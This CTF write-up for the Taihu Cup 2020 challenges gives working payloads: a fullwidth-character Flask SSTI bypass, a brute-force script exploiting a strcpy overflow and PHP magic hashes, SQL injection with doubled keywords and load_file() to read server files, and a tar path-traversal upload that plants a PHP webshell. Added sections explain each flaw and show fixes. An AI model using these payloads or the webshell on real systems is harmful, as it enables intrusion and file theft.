太湖杯 2020 (Taihu Cup 2020)

Reproduced by following along behind Decade; the master is solid.

checkInGame

Comment out updateTime.

easyWeb

A character normalizer, which is quite fun: the challenge filters the characters you normally need for Flask SSTI, and the bypass is to send Unicode look-alikes (fullwidth forms, for example) that the normalizer folds back to ASCII after the filter has already run.

Filtered characters: { } [ ] ' "

Payload (written in ASCII here; send it with the filtered characters replaced by their fullwidth equivalents):
{{url_for.__globals__['__builtins__']['eval']('__import__("os").popen("cat /flag").read()')}}

Crib a few payloads from:

https://10-0-0-55.github.io/web/flask/ssti/

This payload does not work, which is a bit annoying; apparently you sometimes have to try several.

{{''.__class__.mro()[1].__subclasses__()}}
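The filter-then-normalize ordering is what makes the bypass work. The following is an added example, not code from the challenge or from this writeup: it models the server as a blacklist check followed by NFKC normalization (the exact normalization form used by the challenge is an assumption; fullwidth forms fold back to ASCII under NFKC), shows that a fullwidth-rewritten copy of the payload above passes the blacklist and normalizes to the original, and shows the fix, which is to normalize before checking.

```python
import unicodedata

# Characters the challenge rejects (from the writeup).
BLACKLIST = set("{}[]'\"")

# The ASCII payload from the writeup, which the blacklist blocks as-is.
PAYLOAD = ("{{url_for.__globals__['__builtins__']['eval']"
           "('__import__(\"os\").popen(\"cat /flag\").read()')}}")


def widen(text, chars=BLACKLIST):
    """Replace each blacklisted ASCII char with its fullwidth twin.

    Printable ASCII 0x21..0x7E maps to U+FF01..U+FF5E, a constant offset of 0xFEE0,
    so '{' becomes U+FF5B and "'" becomes U+FF07.
    """
    return "".join(chr(ord(ch) + 0xFEE0) if ch in chars else ch for ch in text)


def waf_blocks(text):
    """Naive blacklist: looks only at the raw bytes the client sent."""
    return any(ch in BLACKLIST for ch in text)


def normalize(text):
    """Assumed normalizer: NFKC folds compatibility characters (fullwidth forms) to ASCII."""
    return unicodedata.normalize("NFKC", text)


def vulnerable_server(user_input):
    """Model of the challenge ordering: check first, normalize afterwards.

    Returns the string that would reach the template engine, or "blocked".
    """
    if waf_blocks(user_input):
        return "blocked"
    return normalize(user_input)


def hardened_server(user_input):
    """Fix: normalize first, then apply the blacklist to the canonical form."""
    canonical = normalize(user_input)
    if waf_blocks(canonical):
        return "blocked"
    return canonical
```

`widen(PAYLOAD)` is what you actually submit; `vulnerable_server` hands the template engine back the exact ASCII payload, while `hardened_server` blocks both the ASCII and the fullwidth form.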

ezMd5

There is an auth.so file (a PHP-CPP extension, judging by the Php::Value types). The decompiled auth():

Php::Parameters *__fastcall auth(Php::Parameters *a1, __int64 a2)
{
  __int64 v2; // rax
  __int64 v3; // rax
  char v5; // [rsp+10h] [rbp-60h]   strcpy target, 0x20 bytes below v6
  char v6[8]; // [rsp+30h] [rbp-40h]   holds the hard-coded hash that is returned
  unsigned __int64 v7; // [rsp+58h] [rbp-18h]   stack canary

  v7 = __readfsqword(0x28u);
  strcpy(v6, "21232f297a57a5a743894a0e4a801fc3");   // md5("admin")
  v2 = std::vector<Php::Value,std::allocator<Php::Value>>::operator[](a2, 1LL);   // second PHP argument
  v3 = Php::Value::operator char const*(v2);
  strcpy(&v5, v3);   // unbounded copy: bytes past the 32nd land in v6
  Php::Value::Value(a1, v6, -1);   // return v6 to PHP as a string
  return a1;
}

The intended point is a stack overflow, and the MD5 check really is easy to get around: v5 sits 0x20 (32) bytes below v6, and strcpy() copies the second argument into v5 with no length check, so a password longer than 32 bytes overwrites the hard-coded md5("admin") in v6, which is exactly the value auth() hands back to PHP. The canary v7 at rbp-0x18 is 0x48 (72) bytes above v5, so the copy (including strcpy's terminating NUL) has to stay within 72 bytes or the process aborts; the brute force below stays well under that.

Could not work it out, so just brute-force it:

import requests

url = "http://122.112.253.121:10032/"

# md5("QNKCDZO") and md5("s878926199a") are the classic "0e<digits>" magic hashes;
# the 'a' padding slides the QNKCDZO tail to different offsets inside the overflowed buffer.
for i in range(50):
    password = 'a' * i + 'QNKCDZO'
    payload = {'name': 's878926199a', 'password': password}
    headers = {
        'X-Forwarded-For': ''
    }

    response = requests.post(url, headers=headers, data=payload)
    if response.text.find('flag{') != -1:
        print(payload)
        print(response.text.encode('utf8'))
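To see why padding the password works, here is an added model of the auth() stack frame, written for this note rather than taken from the challenge or the writeup. It uses the rbp-relative offsets from the decompilation (v5 at -0x60, v6 at -0x40, canary at -0x18) and returns what auth() would hand back to PHP for a given second argument; the canary check is modelled as an abort. It also checks the magic-hash property of the two strings the brute force uses. How the PHP side compares the returned value is not on the page and is not modelled.

```python
import hashlib
import re

HARDCODED = b"21232f297a57a5a743894a0e4a801fc3"   # md5("admin"), strcpy'd into v6

# Byte offsets inside the frame, measured from v5 (rbp-0x60).
V6_OFF = 0x60 - 0x40        # 32: v6 starts right after v5's 32 bytes
CANARY_OFF = 0x60 - 0x18    # 72: first byte of the canary v7


def auth_model(password: bytes) -> bytes:
    """Return the string auth() would return for `password` (its second parameter)."""
    frame = bytearray(CANARY_OFF)
    # strcpy(v6, "2123..."): hash plus NUL sits at v6.
    frame[V6_OFF:V6_OFF + len(HARDCODED) + 1] = HARDCODED + b"\0"
    # strcpy(&v5, v3): copies the argument and its NUL with no bound.
    copied = password + b"\0"
    if len(copied) > CANARY_OFF:
        # Anything reaching rbp-0x18 corrupts v7 and the epilogue aborts.
        raise RuntimeError("*** stack smashing detected ***")
    frame[:len(copied)] = copied
    # Php::Value::Value(a1, v6, -1): v6 read as a C string.
    end = frame.index(0, V6_OFF)
    return bytes(frame[V6_OFF:end])


def max_password_len() -> int:
    """Longest password that does not touch the canary (room minus strcpy's NUL)."""
    return CANARY_OFF - 1


def is_php_magic_md5(s: str) -> bool:
    """True if md5(s) is "0e" followed only by digits, which PHP's loose == reads as 0."""
    return re.fullmatch(r"0e\d+", hashlib.md5(s.encode()).hexdigest()) is not None
```

With fewer than 32 bytes the returned hash is untouched; at exactly 32 bytes the NUL lands on v6 and auth() returns the empty string; beyond that, the tail of the password is what gets returned, which is what the 'a' padding in the brute force is exploring.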

CrossFire

First tried AntSword and could not connect; figured it would not be that simple anyway.

The id parameter here is SQL-injectable. Black-box testing shows a WAF that replaces keywords with the empty string (a single pass, so doubled keywords like ununionion survive as union) plus a string filter, so files are read with load_file() on a hex literal instead of a quoted path:

-1' ununionion selselectect load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870)%23
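The following is an added example, not part of the original writeup, that models the keyword-stripping WAF inferred above (single-pass replacement is an assumption about the black-box behaviour) and builds the payload the writeup uses: doubled keywords that collapse into real ones once stripped, and a MySQL hex literal so the path needs no quotes. It also shows why a WAF that strips until nothing changes would not be fooled by the doubling trick.

```python
import re

# Keywords the black-box WAF blanks out (assumed from the observed behaviour).
KEYWORDS = ["union", "select"]


def waf_single_pass(s: str) -> str:
    """Model of the challenge WAF: each keyword removed once, left to right."""
    for kw in KEYWORDS:
        s = re.sub(kw, "", s, flags=re.IGNORECASE)
    return s


def waf_until_stable(s: str) -> str:
    """Hardened variant: keep stripping until a pass changes nothing."""
    while True:
        stripped = waf_single_pass(s)
        if stripped == s:
            return s
        s = stripped


def split_keyword(kw: str) -> str:
    """Nest the keyword inside itself: union -> ununionion, select -> selselectect.

    Removing the inner copy leaves the outer halves joined back into the keyword.
    """
    half = len(kw) // 2
    return kw[:half] + kw + kw[half:]


def hex_literal(path: str) -> str:
    """MySQL hex string literal (0x2f...) so the path carries no quote characters."""
    return "0x" + path.encode().hex()


def unhex_literal(lit: str) -> str:
    """Decode a 0x... literal back to text (handy for reading someone else's payload)."""
    return bytes.fromhex(lit[2:]).decode()


def build_payload(path: str) -> str:
    """Produce the load_file() injection as sent, with # written literally (%23 in the URL)."""
    return "-1' {} {} load_file({})#".format(
        split_keyword("union"), split_keyword("select"), hex_literal(path))
```

After one pass of the modelled WAF the payload for /var/www/html/index.php is exactly `-1' union select load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870)#`; the stable-stripping variant leaves no keyword behind at all.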

index.php:

<?php
    error_reporting(0);
    session_start();
    include('config.php');

    $upload = 'upload/'.md5("shuyu".$_SERVER['REMOTE_ADDR']);
    @mkdir($upload);
    file_put_contents($upload.'/index.html', '');
    
    if(isset($_POST['submit'])){
        $allow_type=array("jpg","gif","png","bmp","tar","zip");
        $fileext = substr(strrchr($_FILES['file']['name'], '.'), 1);
        if ($_FILES["file"]["error"] > 0 && !in_array($fileext,$type) && $_FILES["file"]["size"] > 204800){
            die('upload error');
        }else{
        
            $filename=addslashes($_FILES['file']['name']);
            $sql="insert into img (filename) values ('$filename')";
            $conn->query($sql);

            $sql="select id from img where filename='$filename'";
            $result=$conn->query($sql);

            if ($result->num_rows > 0) {
                while($row = $result->fetch_assoc()) {
                    $id=$row["id"];
                }

            move_uploaded_file($_FILES["file"]["tmp_name"],$upload.'/'.$filename);
            header("Location: index.php?id=$id");
            }
        }
    }

    elseif (isset($_GET['id'])){
        $id=addslashes($_GET['id']);
        $sql="select filename from img where id=$id";
        $result=$conn->query($sql);
        if ($result->num_rows > 0) {
            while($row = $result->fetch_assoc()) {
                $filename=$row["filename"];
            }
        $img=$upload.'/'.$filename;
        echo "<img src='$img'/>";
        }
    }

    elseif (isset($_POST['submit1'])){
        $allow_type=array("jpg","gif","png","bmp","tar","zip");
        $fileext = substr(strrchr($_FILES['file']['name'], '.'), 1);
        if ($_FILES["file"]["error"] > 0 && !in_array($fileext,$type) && $_FILES["file"]["size"] > 204800){
            die('upload error');
        }else{
            $filename=addslashes($_FILES['file']['name']);
            move_uploaded_file($_FILES["file"]["tmp_name"],$upload.'/'.$filename);
            @exec("cd /tmp&&python3 /tar.py ".escapeshellarg('/var/www/html/'.$upload.'/'.$filename));
            }
        }
?>

There is a tar.py file; read that one too:

-1' ununionion selselectect load_file(0x2f7461722e7079)%23

Source:

import sys
import tarfile

# Extracts the uploaded archive into the current directory (/tmp, per the exec() in index.php)
# with no check on member names, so ../ in a name escapes that directory.
tar = tarfile.open(sys.argv[1], "r")
tar.extractall()

All it does is extract the uploaded tar with extractall() and no check on member names, so a member whose name climbs out with ../ is written outside the working directory. tar's -P keeps such a name as-is instead of stripping the leading ../:

tar cvf exp22.tar ../../../var/www/html/upload/shell.php -P

This packs a single file whose member name is the traversal path.

Finally upload it through the submit1 form so tar.py extracts it; relative to /tmp the member lands at /var/www/html/upload/shell.php, which gives a shell, and then run readflag.
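As an added example (not from the challenge or the writeup), the same archive built in Python rather than with `tar -P`, together with the member-name check that tar.py lacks. The archive is built in memory, the webshell content is a constructed sample, and the landing path is computed the way extractall() joins the extraction directory and the member name, so nothing is written to disk by the check itself.

```python
import io
import posixpath
import tarfile

# Same member name as:  tar cvf exp22.tar ../../../var/www/html/upload/shell.php -P
TRAVERSAL_NAME = "../../../var/www/html/upload/shell.php"
WEBSHELL = b"<?php system($_GET['cmd']); ?>\n"   # constructed sample content


def build_exploit_tar(member_name: str = TRAVERSAL_NAME, content: bytes = WEBSHELL) -> bytes:
    """Build the archive in memory; tarfile stores the name verbatim, like tar -P."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(content)
        tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def landing_paths(tar_bytes: bytes, extract_dir: str) -> dict:
    """Where each member would be written: join with the extraction dir, then normalize."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        return {m.name: posixpath.normpath(posixpath.join(extract_dir, m.name))
                for m in tar.getmembers()}


def escaping_members(tar_bytes: bytes, extract_dir: str) -> list:
    """Members whose resolved path is not inside extract_dir (the check tar.py is missing)."""
    base = posixpath.normpath(extract_dir)
    prefix = base.rstrip("/") + "/"
    return [name for name, dest in landing_paths(tar_bytes, extract_dir).items()
            if dest != base and not dest.startswith(prefix)]


def safe_extractall(tar_bytes: bytes, extract_dir: str) -> None:
    """Refuse the whole archive if any member would escape, otherwise extract."""
    bad = escaping_members(tar_bytes, extract_dir)
    if bad:
        raise ValueError("path traversal in tar members: {}".format(bad))
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        tar.extractall(path=extract_dir)
```

Against the exploit archive the check reports the shell.php member as escaping /tmp to /var/www/html/upload/shell.php and `safe_extractall` refuses it; a member named without any ../ passes. Newer Python releases also accept `tar.extractall(filter="data")`, which rejects such members itself.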
